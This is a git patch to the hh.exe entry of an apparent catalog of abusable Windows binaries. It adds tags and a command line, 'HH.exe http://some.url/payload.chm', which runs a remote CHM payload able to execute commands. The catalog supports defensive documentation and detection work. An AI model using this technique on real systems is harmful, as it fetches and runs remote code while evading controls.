From bbe0681a9a02b52f423c4d8dd568c901c59d8704 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 13:24:23 +0200
Subject: [PATCH] Update Hh.yml Tags and Added command

Added the command to execute remote CHM files
Added Tags
---
 yml/OSBinaries/Hh.yml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
index f6db470..9d96358 100644
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -18,6 +18,20 @@ Commands:
     Privileges: User
     MitreID: T1218.001
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
+      - Input: Custom Format
+  - Command: HH.exe http://some.url/payload.chm
+    Description: Executes a remote payload.chm file which can contain commands.
+    Usecase: Execute commands with HH.exe
+    Category: Execute
+    Privileges: User
+    MitreID: T1218.001
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
+      - Execute: CHM
+      - Input: Custom Format
 Full_Path:
   - Path: C:\Windows\hh.exe
   - Path: C:\Windows\SysWOW64\hh.exe